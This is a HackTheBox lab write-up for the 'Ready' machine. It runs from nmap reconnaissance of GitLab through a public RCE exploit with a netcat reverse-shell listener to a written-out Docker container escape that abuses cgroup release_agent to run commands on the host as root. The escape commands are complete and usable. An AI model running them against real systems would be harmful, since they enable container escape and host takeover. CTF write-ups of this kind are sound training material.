Hackthebox Ready WriteUp
Overview:
Reay is a interesting box that teaches Docker breakout. First off the start with a vulnerable gitlab that has a public exploit, After gotten into the box and realized it was inside a docker container and the container has a vulnerability that allows you to execute command outside the container and get code execution as root. With all the being said, Let’s just jump in!
Reconnaissance:
┌─[eu-vip-3]─[10.10.14.6]─[root@parrot]─[~/htb/boxes/ready]
└──╼ [★]$ nmap -sC -sV 10.10.10.220
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-15 10:09 BST
Nmap scan report for 10.10.10.220
Host is up (0.20s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 48:ad:d5:b8:3a:9f:bc:be:f7:e8:20:1e:f6:bf:de:ae (RSA)
| 256 b7:89:6c:0b:20:ed:49:b2:c1:86:7c:29:92:74:1c:1f (ECDSA)
|_ 256 18:cd:9d:08:a6:21:a8:b8:b6:f7:9f:8d:40:51:54:fb (ED25519)
5080/tcp open http nginx
| http-robots.txt: 53 disallowed entries (15 shown)
| / /autocomplete/users /search /api /admin /profile
| /dashboard /projects/new /groups/new /groups/*/edit /users /help
|_/s/ /snippets/new /snippets/*/edit
| http-title: Sign in \xC2\xB7 GitLab
|_Requested resource was http://10.10.10.220:5080/users/sign_in
|_http-trane-info: Problem with XML parsing of /evox/about
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.40 seconds
There is http://10.10.10.220:5080/users/sign_in url on nmap scan, let’s hear over and can see a gitlab.
Create an account then login and check the version.
Search public exploits about this version and found a RCE exploit.
Usage:python3 exploit.py -u username -p password-g http://10.10.10.220 -l 10.10.14.x -P 443nc -nvlp 443
PriEsc to root:
On the /opt/backup there are config files and we can grep root’s password
After got root, I realized l’m in a docker container. But there is a blog below explains how to breakout docker.
Created payload based on above blog. It mounts the docker cgroup to /tmp then executes command outside the container, You can change cat /root/root.txt to a reverse shell if you want.
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo '$host_path/cmd' > /tmp/cgrp/release_agentecho '#!/bin/sh' > /cmd
echo "cat /root/root.txt > $host_path/output" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
As we can see it outputs the root flag to /output directory.
